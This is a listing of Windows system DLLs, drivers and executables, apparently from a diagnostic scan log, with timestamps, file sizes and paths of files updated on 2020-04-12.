2020-04-12 05:49 - 2020-04-12 05:49 - 014818816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Xaml.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 009930552 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 008013824 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 007604584 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Protection.PlayReady.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 007017472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 006525424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Protection.PlayReady.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 004563200 _____ (Microsoft Corporation) C:\Windows\system32\sppsvc.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 004129416 _____ (Microsoft Corporation) C:\Windows\system32\mfcore.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 003799552 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 003753472 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_nt.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 003742544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 003547648 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 002986808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2020-04-12 05:49 - 2020-04-12 05:49 - 002871608 _____ (Microsoft Corporation) C:\Windows\system32\aitstatic.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 002800128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32kfull.sys
2020-04-12 05:49 - 2020-04-12 05:49 - 002768440 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 002494744 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 002369576 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.AppAgent.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 002188600 _____ (Microsoft Corporation) C:\Windows\system32\AppVEntSubsystems64.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 002087168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001945600 _____ (Microsoft Corporation) C:\Windows\system32\dcomp.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001835008 _____ (Microsoft Corporation) C:\Windows\system32\enterprisecsps.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001757096 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2020-04-12 05:49 - 2020-04-12 05:49 - 001726264 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001659408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Microsoft.Uev.AppAgent.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001610240 _____ (Microsoft Corporation) C:\Windows\system32\HologramCompositor.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001587712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aadtb.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001545216 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 001512832 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 001495864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppVEntSubsystems32.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001477112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dcomp.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001397560 _____ (Microsoft Corporation) C:\Windows\system32\hvix64.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 001386296 _____ (Microsoft Corporation) C:\Windows\system32\AppVEntSubsystemController.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001368576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Wpc.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001368576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Input.Inking.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001300280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\http.sys
2020-04-12 05:49 - 2020-04-12 05:49 - 001264640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 001261808 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001257472 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001245184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TokenBroker.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001243648 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001081856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Networking.Vpn.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001077264 _____ (Microsoft Corporation) C:\Windows\system32\hvax64.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 001055376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000993280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSWorkspace.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000980832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webservices.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000974336 _____ (Microsoft Corporation) C:\Windows\system32\uDWM.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000924672 _____ (Microsoft Corporation) C:\Windows\system32\samsrv.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000923136 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Management.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000912896 _____ (Microsoft Corporation) C:\Windows\system32\rasmans.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000892416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MbaeApiPublic.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000865280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000865280 _____ (Microsoft Corporation) C:\Windows\system32\netlogon.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000811320 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000785920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000759272 _____ (Microsoft Corporation) C:\Windows\system32\taskschd.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000747320 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000744960 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.Office2013CustomActions.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000729600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FlightSettings.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000701440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Mirage.Internal.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000701440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\BTAGService.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000689152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CPFilters.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000673704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppXDeploymentClient.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000665088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netlogon.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000647680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Internal.Management.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000638480 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000632832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WpcWebFilter.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000628408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000618296 _____ (Microsoft Corporation) C:\Windows\system32\hal.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000604984 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000555008 _____ (Microsoft Corporation) C:\Windows\system32\appwiz.cpl
2020-04-12 05:49 - 2020-04-12 05:49 - 000538160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SHCore.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000530432 _____ (Microsoft Corporation) C:\Windows\system32\sppcext.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000529408 _____ (Microsoft Corporation) C:\Windows\system32\nltest.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000515600 _____ (Microsoft Corporation) C:\Windows\system32\dcntel.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000514560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Microsoft.Uev.Office2013CustomActions.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000513576 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000507152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\taskschd.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000498688 _____ (Microsoft Corporation) C:\Windows\system32\ntshrui.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000497152 _____ (Microsoft Corporation) C:\Windows\system32\wuuhext.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000491008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sppcext.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000487784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000477496 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2020-04-12 05:49 - 2020-04-12 05:49 - 000465208 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000456504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdbss.sys
2020-04-12 05:49 - 2020-04-12 05:49 - 000456192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appwiz.cpl
2020-04-12 05:49 - 2020-04-12 05:49 - 000452096 _____ (Microsoft Corporation) C:\Windows\system32\rdpclip.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000415760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aepic.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000410112 _____ (Microsoft Corporation) C:\Windows\system32\rascustom.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000406480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Enumeration.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000401408 _____ (Microsoft Corporation) C:\Windows\system32\es.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000381440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntshrui.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000336384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\es.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000330240 _____ (Microsoft Corporation) C:\Windows\system32\omadmclient.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000324408 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000324096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32k.sys
2020-04-12 05:49 - 2020-04-12 05:49 - 000323584 _____ (Microsoft Corporation) C:\Windows\system32\sppcommdlg.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000321536 _____ (Microsoft Corporation) C:\Windows\system32\wbadmin.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000277864 _____ (Microsoft Corporation) C:\Windows\system32\LsaIso.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000259776 _____ (Microsoft Corporation) C:\Windows\system32\logoncli.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000251704 _____ (Microsoft Corporation) C:\Windows\system32\offlinesam.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000234496 _____ (Microsoft Corporation) C:\Windows\system32\iasrad.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000227840 _____ (Microsoft Corporation) C:\Windows\system32\IndexedDbLegacy.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000211256 _____ (Microsoft Corporation) C:\Windows\system32\tcbloader.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000203264 _____ (Microsoft Corporation) C:\Windows\system32\LanguageComponentsInstaller.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000197632 _____ (Microsoft Corporation) C:\Windows\system32\Win32CompatibilityAppraiserCSP.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000190048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\logoncli.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000187392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iasrad.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000185952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\deviceaccess.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000179200 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.XamlHost.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000178192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\partmgr.sys
2020-04-12 05:49 - 2020-04-12 05:49 - 000175616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IndexedDbLegacy.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000164368 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000163840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\updatepolicy.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000147696 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000142544 _____ (Microsoft Corporation) C:\Windows\system32\LicensingUI.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000140800 _____ (Microsoft Corporation) C:\Windows\system32\slc.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000136192 _____ (Microsoft Corporation) C:\Windows\system32\sppc.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000135168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.XamlHost.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000123952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KerbClientShared.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000122368 _____ (Microsoft Corporation) C:\Windows\system32\samlib.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000118272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\slc.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000115120 _____ (Microsoft Corporation) C:\Windows\system32\phoneactivate.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000105984 _____ (Microsoft Corporation) C:\Windows\system32\utcutil.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000102216 _____ (Microsoft Corporation) C:\Windows\system32\changepk.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000101888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sppc.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000093712 _____ (Microsoft Corporation) C:\Windows\system32\hvloader.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000090624 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000089536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32u.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000087040 _____ (Microsoft Corporation) C:\Windows\system32\iasacct.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000084280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hvservice.sys
2020-04-12 05:49 - 2020-04-12 05:49 - 000071680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Custom.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000071480 _____ (Microsoft Corporation) C:\Windows\system32\win32appinventorycsp.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000070144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000066624 _____ (Microsoft Corporation) C:\Windows\system32\iumcrypt.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000066048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iasacct.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000064512 _____ (Microsoft Corporation) C:\Windows\system32\pcadm.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000051200 _____ (Microsoft Corporation) C:\Windows\system32\pcalua.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000050544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CloudNotifications.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\iaspolcy.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000049152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tbauth.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000045568 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.Office2010CustomActions.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000043008 _____ (Microsoft Corporation) C:\Windows\system32\UpgradeResultsUI.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000040448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iaspolcy.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Microsoft.Uev.Office2010CustomActions.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000036152 _____ (Microsoft Corporation) C:\Windows\system32\DeviceCensus.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000033080 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hwpolicy.sys
2020-04-12 05:49 - 2020-04-12 05:49 - 000031744 _____ (Microsoft Corporation) C:\Windows\system32\wksprtPS.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000031744 _____ (Microsoft Corporation) C:\Windows\system32\ias.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000029696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cmintegrator.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000029184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TokenBrokerCookies.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000023552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ias.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000022528 _____ (Microsoft Corporation) C:\Windows\system32\slcext.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000021520 _____ (Microsoft Corporation) C:\Windows\system32\kdhvcom.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000019968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\slcext.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000017920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wksprtPS.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000015872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Custom.ps.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000012800 _____ (Microsoft Corporation) C:\Windows\system32\pcaevts.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000010752 _____ (Microsoft Corporation) C:\Windows\system32\DMAlertListener.ProxyStub.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DMAlertListener.ProxyStub.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 017790464 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 007849216 _____ (Microsoft Corporation) C:\Windows\system32\OneCoreUAPCommonProxyStub.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 006168064 _____ (Microsoft Corporation) C:\Windows\system32\twinui.pcshell.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 003977216 _____ (Microsoft Corporation) C:\Windows\system32\tellib.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 003728384 _____ (Microsoft Corporation) C:\Windows\system32\win32kfull.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 003708928 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentServer.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 003586872 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 003109376 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 002143232 _____ (Microsoft Corporation) C:\Windows\system32\WpcDesktopMonSvc.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 002126144 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 002114560 _____ (Microsoft Corporation) C:\Windows\system32\Windows.CloudStore.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001960448 _____ (Microsoft Corporation) C:\Windows\system32\aadtb.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001942528 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001918976 _____ (Microsoft Corporation) C:\Windows\system32\wevtsvc.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001783296 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Input.Inking.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001762816 _____ (Microsoft Corporation) C:\Windows\system32\wwansvc.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001719808 _____ (Microsoft Corporation) C:\Windows\system32\Wpc.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001497600 _____ (Microsoft Corporation) C:\Windows\system32\TokenBroker.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001480192 _____ (Microsoft Corporation) C:\Windows\system32\usocoreworker.exe
2020-04-12 05:48 - 2020-04-12 05:48 - 001427456 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.Vpn.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001413704 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001378528 _____ (Microsoft Corporation) C:\Windows\system32\webservices.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001263856 _____ (Microsoft Corporation) C:\Windows\system32\WpcMon.exe
2020-04-12 05:48 - 2020-04-12 05:48 - 001180672 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Security.Authentication.Web.Core.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001136128 _____ (Microsoft Corporation) C:\Windows\system32\MbaeApiPublic.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001127424 _____ (Microsoft Corporation) C:\Windows\system32\WpcRefreshTask.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001083904 _____ (Microsoft Corporation) C:\Windows\system32\MusUpdateHandlers.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001071616 _____ (Microsoft Corporation) C:\Windows\system32\BTAGService.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001011200 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000915192 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentClient.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000893952 _____ (Microsoft Corporation) C:\Windows\system32\FlightSettings.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000879616 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Management.Service.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000874512 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms2.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000840704 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_Language.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000735744 _____ (Microsoft Corporation) C:\Windows\system32\AudioEndpointBuilder.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000722072 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000684560 _____ (Microsoft Corporation) C:\Windows\system32\SHCore.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000654912 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000637240 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storport.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000605184 _____ (Microsoft Corporation) C:\Windows\system32\MusNotification.exe
2020-04-12 05:48 - 2020-04-12 05:48 - 000589384 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2020-04-12 05:48 - 2020-04-12 05:48 - 000550400 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000524264 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Enumeration.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000516096 _____ (Microsoft Corporation) C:\Windows\system32\MusNotificationUx.exe
2020-04-12 05:48 - 2020-04-12 05:48 - 000469504 _____ (Microsoft Corporation) C:\Windows\system32\cloudAP.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000459688 _____ (Microsoft Corporation) C:\Windows\system32\MusNotifyIcon.exe
2020-04-12 05:48 - 2020-04-12 05:48 - 000441144 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000437560 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\pci.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000416016 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000374784 _____ (Microsoft Corporation) C:\Windows\system32\ncbservice.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000355328 _____ (Microsoft Corporation) C:\Windows\system32\WpcApi.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000297272 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sdbus.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000278016 _____ (Microsoft Corporation) C:\Windows\system32\WpcTok.exe
2020-04-12 05:48 - 2020-04-12 05:48 - 000265216 _____ (Microsoft Corporation) C:\Windows\system32\cdd.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000259072 _____ (Microsoft Corporation) C:\Windows\system32\VPNv2CSP.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000256000 _____ (Microsoft Corporation) C:\Windows\system32\UpdateDeploymentProvider.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000251392 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\winnat.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000241152 _____ (Microsoft Corporation) C:\Windows\system32\policymanagerprecheck.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000231912 _____ (Microsoft Corporation) C:\Windows\system32\deviceaccess.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000200192 _____ (Microsoft Corporation) C:\Windows\system32\updatepolicy.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000193848 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dumpsd.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000169472 _____ (Microsoft Corporation) C:\Windows\system32\SpatialAudioLicenseSrv.exe
2020-04-12 05:48 - 2020-04-12 05:48 - 000152408 _____ (Microsoft Corporation) C:\Windows\system32\KerbClientShared.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000151352 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\scmbus.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000127064 _____ (Microsoft Corporation) C:\Windows\system32\win32u.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000108032 _____ (Microsoft Corporation) C:\Windows\system32\wwanprotdim.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000096768 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Custom.dll
